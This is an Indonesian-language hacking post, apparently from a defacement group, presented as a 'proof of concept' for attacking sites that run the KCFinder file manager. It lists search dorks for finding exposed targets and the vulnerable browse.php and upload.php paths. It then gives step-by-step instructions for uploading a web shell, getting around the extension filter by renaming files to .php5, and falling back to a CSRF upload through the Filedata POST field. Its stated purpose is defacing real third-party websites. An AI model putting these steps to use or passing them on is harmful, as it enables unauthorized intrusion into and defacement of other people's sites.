Proof Of Concept KCFinder*
Halo sobat IES team, kali ini saya akan membahas tentang cara deface proof of concept(POC) KCFinder. OK LANGSUNG AJA YAK
dork:
- inurl:/upload/files -kcfinder ext:xml
- inurl:/webroot/upload/files ext:xml
- inurl:/app/webroot/upload/files ext:xml
- inurl:/admin/upload/files ext:xml
example:
- site.com/upload/files/namafile.ext
- site.com/webroot/upload/files/namafile.ext
- site.com/app/webroot/upload/files/namafile.ext
- site.com/[path]/upload/files/namafile.ext
exploit:
- site.tld/kcfinder/browse.php
- site.tld/kcfinder/upload.php
- site.tld/webroot/kcfinder/browse.php
- site.tld/webroot/kcfinder/upload.php
- site.tld/app/webroot/kcfinder/browse.php
- site.tld/app/webroot/kcfinder/upload.php
- site.tld/[path]/kcfinder/browse.php
prefensi dari gua:
dorking /upload/files/ *delete* /upload/files/ nya, atau ganti /upload/files/ jadi /kcfinder, jika notfound atau 404 atau error dll, liat lagi link path kcfinder nya itu, kalo dia ada pasti replace slash, misal.
contoh pertama taro /kcfinder:
site.com/[path]/kcfinder
kalo ada bakal berubah kayagini:
site.com/[path]/kcfinder/
kalo tetep kayagini:
site.com/[path]/kcfinder
ya berarti emang gaada.
[path] cuma buat contoh kalo dibelakang /upload/files/ masih ada path lain misal kaya site.com/admin/upload/files/ atau site.com/app/webroot/upload/files dan seterusnya.
jika nemu yang ngreplace kayagitu tambahin browse.php atau upload.php kaya exploit yang gua kasih diatas, itu kalo notfound atau galangsung muncul tampilan kcfinder nya.
kalo udah tinggal upload uploader punya lo, bypass ext nya dengan .php5 jadi ganti namashelllo.php jadi namashelllo.php5, gapaham? gausah depes.
nah kalo denied extension? cari target lain:v
and kalo gabisa ngakses browse.php atau file browse.php nya blank? itu tanda nya file browse.php udah di delete.
lo bisa akalin pake upload.php lewat csrf yang type post nya Filedata.
jadi kalo 22 nya ganerima satu sama lain tandanya bukan jodoh lo(:
cuma itu yang bisa gua bagi kekalian:)
